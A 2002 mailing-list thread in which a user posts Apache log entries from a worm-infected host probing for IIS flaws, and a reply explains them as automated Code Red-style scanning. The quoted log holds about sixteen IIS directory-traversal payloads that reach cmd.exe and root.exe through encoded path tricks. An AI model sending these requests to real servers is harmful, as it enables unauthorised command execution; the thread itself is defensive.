[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Strange httpd/access_log entry
Unless you're running IIS, you don't have to worry about those. Those
are the entries generated by a machine infected with the code red IIS
thing or one of the variants (code red's a virus, not a trojan, right?).
Anyway, an infected machine picks a bunch of other IPs to scan for
vulnurable scripts - the list you see is a list of common IIS vulnurable
scripts. Soem variants scan random IPs, some scan their whole class C,
some pick IPs differently. Either way, it's probably not a real person
scanning you. You might send a message to the admin for that IP, but if
they're still having problems with that vulnerability, they're probably
not the most diligent admin around. :)
--Danny
On Thu, Apr 11, 2002 at 11:52:33AM -0500, Gary wrote:
> Can anyone help me out here...
>
> I found these entries, is someone trying to hack me?
> What is really weird is in a browser, if I type file://64.163.212.171/
> I get the entire listing for my HD
>
> Doing a host -a 64.163.212.171 yields a reverse entry for pacbel...
>
> Log entries are:
>
> 64.163.212.171 - - [11/Apr/2002:11:01:34 -0500] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:35 -0500] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:35 -0500] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:36 -0500] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:39 -0500] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-"
> "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:40 -0500] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 329 "-" "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:40 -0500] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 329 "-" "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:41 -0500] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 345 "-" "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:41 -0500] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
> "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:42 -0500] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
> "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:42 -0500] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
> "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:43 -0500] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
> "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:47 -0500] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-"
> "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:47 -0500] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-"
> "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:51 -0500] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> "-" "-"
> 64.163.212.171 - - [11/Apr/2002:11:01:51 -0500] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-"
> "-"
>
>
> --
> Best regards,
> Gary
>
>
> -
> To unsubscribe, send email to majordomo@luci.org with
> "unsubscribe luci-discuss" in the body.
-
To unsubscribe, send email to majordomo@luci.org with
"unsubscribe luci-discuss" in the body.